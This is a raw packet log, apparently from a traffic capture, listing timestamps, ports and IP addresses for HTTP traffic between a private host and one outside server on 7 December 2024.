Dec 7, 2024 15:47:47.050151110 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.050164938 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.050194979 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.050208092 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.051129103 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.051160097 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.051172018 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.051173925 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.051197052 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.051213026 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.051877022 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.051924944 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.051947117 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.051961899 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.051987886 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.052000046 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.052786112 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.052834988 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.052871943 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.052886009 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.052917957 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.052932978 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.053716898 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.053764105 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.053774118 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.053797960 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.053823948 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.053839922 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.054727077 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.054740906 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.054760933 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.054788113 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.054811954 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.055710077 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.055740118 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.055756092 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.055764914 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.055783033 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.055799961 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.056530952 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.056586981 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.056591034 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.056603909 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.056632042 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.056662083 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.057364941 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.057411909 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.057460070 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.057471991 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.057503939 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.057517052 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.058249950 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.058303118 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.058326960 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.058339119 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.058367014 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.058382034 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.059185028 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.059237003 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.059251070 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.059263945 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.059292078 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.059305906 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.060138941 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.060185909 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.060206890 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.060214043 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.060236931 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.060256004 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.221266985 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.221290112 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.221319914 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.221365929 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.221400976 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.221554995 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.221596003 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.221610069 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.221623898 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.221646070 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.221663952 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.222485065 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.222533941 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.222552061 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.222567081 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.222584009 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.222610950 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.223351002 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.223393917 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.223419905 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.223437071 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.223453999 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.223468065 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.224391937 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.224437952 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.224447012 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.224458933 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.224481106 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.224497080 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.225204945 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.225233078 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.225248098 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.225248098 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.225265980 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.225279093 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.226084948 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.226129055 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.226160049 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.226171970 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.226196051 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.226207972 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.226990938 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.227035046 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.227078915 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.227091074 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.227113962 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.227129936 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.227941990 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.227984905 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.228009939 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.228024960 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.228040934 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.228056908 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.228832960 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.228878975 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.228919983 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.228933096 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.228960037 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.228972912 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.230014086 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.230067968 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.230083942 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.230096102 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.230134010 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.230144978 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.230689049 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.230716944 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.230727911 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.230741024 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.230751991 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.231565952 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.231587887 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.231606960 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.231669903 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.231683969 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.231705904 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.231722116 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.232523918 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.232536077 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.232558012 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.232566118 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.232600927 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.233510017 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.233558893 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.233582020 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.233594894 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.233614922 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.233635902 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.234458923 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.234500885 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.234513998 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.234528065 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.234545946 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.234563112 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.235224962 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.235259056 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.235264063 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.235270977 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.235291958 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.235318899 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.236116886 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.236159086 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.236227989 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.236239910 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.236267090 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.237530947 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.237545013 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.237571955 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.237574100 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.237591982 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.237607956 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.238221884 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.238265038 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.238276005 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.238289118 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.238308907 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.238326073 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.238955021 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.238997936 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.239001036 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.239012003 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.239031076 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.239043951 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.239733934 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.239784956 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.239808083 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.239820004 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.239840984 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.239856005 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.240653038 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.240691900 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.241022110 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.241067886 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.241070986 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.241086960 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.241106033 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.241122961 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.241868973 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.241909981 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.241934061 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.241966963 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.241986990 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.242005110 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.242775917 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.242825985 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.242841005 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.242856026 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.242873907 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.242886066 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.243704081 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.243751049 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.243778944 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.243802071 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.243832111 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.243832111 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.244623899 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.244668007 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.244685888 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.244703054 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.244720936 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.244733095 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.245544910 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.245592117 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.245655060 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.245667934 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.245701075 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.245718956 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.246433020 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.246480942 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.246496916 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.246510029 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.246532917 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.246550083 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.247355938 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.247381926 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.247392893 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.247422934 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.247422934 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.248256922 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.248282909 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.248295069 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.248337030 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.248348951 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.248388052 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.248388052 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.249169111 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.249221087 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.249243975 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.249257088 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.249280930 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.249301910 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.250165939 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.250206947 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.250221014 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.250236034 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.250255108 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.250267029 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.251080036 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.251118898 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.251125097 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.251137972 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.251163960 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.251897097 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.251940012 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.252053976 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.252089024 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.252120018 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.252130985 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.252855062 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.252897978 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.413223028 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.413256884 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.413271904 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.413301945 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.413345098 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.413621902 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.413669109 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.413826942 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.413875103 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.414186001 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.414211988 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.414227009 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.414237976 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.414258003 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.414271116 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.414907932 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.414920092 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.414942026 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.414953947 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.414979935 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.415844917 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.415889025 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.415900946 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.415914059 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.415940046 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.415952921 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.416687012 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.416735888 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.416738987 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.416750908 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.416773081 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.416790009 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.417625904 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.417673111 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.417675972 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.417689085 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.417716026 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.418495893 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.418557882 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.418562889 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.418577909 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.418595076 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.418615103 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.419415951 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.419460058 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.419464111 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.419472933 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.419497967 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.419512033 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.420402050 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.420423985 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.420445919 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.420458078 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.420481920 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.421458006 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.421508074 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.421534061 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.421545982 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.421570063 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.421586990 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.422302961 CET	80	49706	107.175.113.196	192.168.2.5
